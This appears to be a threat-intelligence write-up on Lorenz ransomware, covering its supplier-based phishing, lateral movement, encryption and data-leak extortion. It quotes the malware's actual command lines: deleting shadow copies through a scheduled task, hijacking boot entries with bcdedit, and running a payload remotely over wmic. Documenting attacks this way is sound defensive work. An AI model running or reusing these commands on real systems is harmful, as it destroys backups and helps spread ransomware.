Lorenz Ransomware

Lorenz appears to be the same as ThunderCrypt ransomware.
However, it’s not clear if Lorenz was created by the same group or if the group purchased the source code of ThunderCrypt and created its own variant.

Shortly after Lorenz was discovered, the group faced a temporary problem after researchers published a free decryptor (download here).
The decryptor was released by the project No More Ransom, a joint project by law enforcement agencies including Europol’s European Cybercrime Center.

It’s worth noting that that decrypter is very limited and only supports .docx, .pptx, .xlsx and .zip.
In addition, in the test that analysts ran for both old and newer samples – the decrypter did not work and kept alerting that it doesn’t support the files

The Lorenz operators put a lot of effort into their attacks. They study their target’s employees, suppliers and partners. This way, the Lorenz group can even go from one, already compromised victim, to another. The knowledge they have collected is used to customize the attack specifically for the target.

In a reported incident, the attackers used one compromised victim to “jump” to another.
The group gained access to the network via a phishing email, but not just any phishing email. The group, after doing their research on the target, sent the email from a legitimate email account of a real employee at a supplier that they’d already been compromised.
This way the email appears to be legitimate and increases the chances of falling to the scam.

Then the attackers trick employees into installing an application that provides the attackers with full access to the network, including the employees’ email, even after they reset their passwords.
In some cases, the attackers even used the compromised email accounts to email the IT, legal, and cyber insurance teams working with the targeted organization to threaten further attacks if they didn’t pay.

After gaining an initial foothold in the network, the attackers start to perform reconnaissance commands, move laterally within the network, and collect sensitive data including credentials, file, databases and emails.

The main goal for the attackers when moving laterally is to compromise a domain controller and obtain domain administrator credentials.
This allows them to perform additional activities, and later on selling access to the compromised network.

Since the Lorenz group customize the attack for the target, analysts have observed different binaries of Lorenz that have different behavior.
This can also point to the fact that the Lorenz group continues to update the ransomware, even if that means to create changes frequently.

Some of the Lorenz binaries observed used the well known vssadmin command to delete the virtual shadow copies of the system. Vssadmin.exe is a command-line tool that manages Volume Shadow Copy Service (VSS), which captures and copies stable images for backup on running systems.

Ransomware commonly uses vssadmin.exe to delete shadow copies and other backups of files before encrypting the files themselves.
This is another way to ensure that the victim will be forced to pay to decrypt the valuable files when they can neither be decrypted or retrieved from VSS.

Lorenz creates a scheduled task whose name starts with “sz40” and then sets it to run Vssadmin with the following command line.
After running, the scheduled task is deleted.

cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz403 /TR “vssadmin Delete Shadows /For=C:” &SCHTASKS /run /TN sz403&SCHTASKS /Delete /TN sz403 /F

One unique behavior observed in some of the Lorenz binary is the creation of another boot entry for possibly misleading purposes. A boot entry is a set of options that defines a load configuration for an operating system or bootable program.
It is possible to have multiple boot entries for an operating system, each with a different set of boot parameters.

Lorenz uses the command utility bcdedit to copy the existing boot entry and modify it, which is the most common way to create a new boot entry.
But it does one strange thing. The /timeout operator is set to 100,000 seconds, which is about 27 (!) hours.

By doing so, the system waits 27 hours before the boot manager selects the default entry if the user doesn’t choose manually.
Since Lorenz changes the description of the boot entries to “Lorenz Encrypt System”, the user can be misled that the operating system is compromised entirely.
In addition, if it is a system that operates without user interaction or that the system is not in the network and it’s impossible to connect, the system will not load the OS for 27 hours.

cmd.exe /c bcdedit /copy {current} /d “Lorenz Encrypt System” & bcdedit /set {current} description “Lorenz Encrypt System” & bcdedit /timeout 100000 && ipconfig

Some of the samples observed created a remote scheduled task that launches another ransomware binary located on a remote server within the infected network.
This indicates that the attackers performed lateral movement in the environment, collected information and harvest credentials before launching the ransomware payload.

The scheduled tasks names observed in the binaries are consistent with the names found when creating other scheduled tasks in other binaries, and starts with “sz40″.
After execution, the malware deletes the scheduled task to remove tracks.

wmic /node:”’ /USER:” /PASSWORD:” process call create “cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz401 /TR ‘copy \NETLOGONweams.exe %windir%lsamp.exe & start %windir%lsamp.exe’ & SCHTASKS /run /TN sz401&SCHTASKS /Delete /TN sz401 /F”

Some of Lorenz binaries are also configured to change the desktop image of the machine in an additional way to alert the user about what happened.
The wallpaper image is either called “Lorenz.bmp” or a random name. Lorenz drops the .bmp file into %ProgramFiles% or %Windows% folder and then sets the relevant registry keys to configure it as a desktop wallpaper.
Some older versions of Lorenz found on domain controllers were observed deleting the Windows Event Logs to remove tracks of the malicious activities.
Among the logs deleted are Windows PowerShell logs that contain information about PowerShell activities, which suggests the attacker has used them at some point in the attack.
Lorenz uses AES encryption to encrypt the files. For each encrypted file, it appends the extension “.Lorenz.sz40”.
The original files are then deleted. In addition, Lorenz writes to each folder a ransom note named “HELP_SECURITY_EVENT.html” (recently changed to “HELP.txt”) that contains information about what happened to the files, including a link to Lorenz data leak website and a unique TOR payment website where the victim can see the demanded ransom fee and contact the group.

Lorenz has created a relatively unique extortion technique. After stealing files, emails, credentials and databases from victims, the group threatens to publish them in their data leaks website. When Lorenz publishes data, they do things a bit differently compared to other ransomware gangs.

First, Lorenz makes the data available for sale to other threat actors, hackers or possible competitors.
After a while, they start releasing password-protected RAR archives containing the victim’s data.
If no ransom is paid, and the data is not purchased, Lorenz releases the password for the RAR archives containing the data leak so that they are publicly available to anyone who downloads the files.

Beside giving access to the stolen data, Lorenz, in order to maximize profit, sell access to the internal network they have compromised.
This trend is starting to gain popularity among other ransomware gangs as well, due to the understanding that for some threat actors, access to the networks could be more valuable than the data itself.

Sign Up For Threat Alerts

Threats Icon

Dec 08, 2022

Trigona (._locked) ransomware virus

Trigona is ransomware that encrypts files and appends the "._locked" extension to filenames. Also, it...

Threats Icon

Dec 08, 2022

Threat Actors Target Exposed Remote Desktop Protocol...

Threat actors were discovered targeting open Remote Desktop Protocol (RDP) ports with variants from a...

Threats Icon

Dec 07, 2022

Redigo Backdoor Malware Targets Redis Servers

The Redigo backdoor is written in the Go programming language and targets Redis servers vulnerable...

Threats Icon

Dec 06, 2022

DuckLogs MaaS (Malware-as-a-Service) Provides Sophisticated Features

DuckLogs is MaaS (Malware-as-a-Service) advertised on cybercrime forums with a range of features including remote...

Threats Icon

Dec 05, 2022

WannaRen Returns As Life Ransomware

WannaRen ransomware appeared on the threat landscape in 2020 and reemerged in 2022 as Life...

Threats Icon

Dec 04, 2022

Alert (AA22-335A) Cuba Ransomware

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are...

Threats Icon

Dec 01, 2022

UNC4191 Threat Group Targets Entities In The...

The UNC4191 threat group was discovered targeting entities in the Philippines with custom malware and...

Threats Icon

Nov 30, 2022

Emotet Leads To Quantum Ransomware Infection

Threat actors were observed using Emotet to gain access to the victim's network and deploy...

Threats Icon

Nov 29, 2022

RansomExx Upgrades to Rust

IBM Security X-Force Threat Researchers have discovered a new variant of the RansomExx ransomware that...

Threats Icon

Nov 29, 2022

Ransomware Roundup: Cryptonite Ransomware

FortiGuard Labs has reported on Cryptonite ransomware, which was found to target Microsoft Windows machines...

Threats Icon

Nov 28, 2022

Operation Typhoon: The Cyber Sea Lotus Coveting...

Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions...

Threats Icon

Nov 27, 2022

IL-Cert Alert – Active phishing campaign in...

There is a new phishing campaign in Israel. The malware relies upon user execution. The...

Threats Icon

Nov 27, 2022

Emotets Vacation Is Over: No Rest For...

Emotet started as a banking Trojan in spreading via spam campaigns by imitating financial statements,...

Threats Icon

Nov 24, 2022

Aurora: A Rising Stealer Flying Under The...

Aurora is a multipurpose botnet with data collection, information stealer, downloading, and remote access Trojan...

Threats Icon

Nov 23, 2022

Analysis Of The ViperSoftX And VenomSoftX Information...

Torrents and software-sharing sites are being used to target victims across the globe with variants...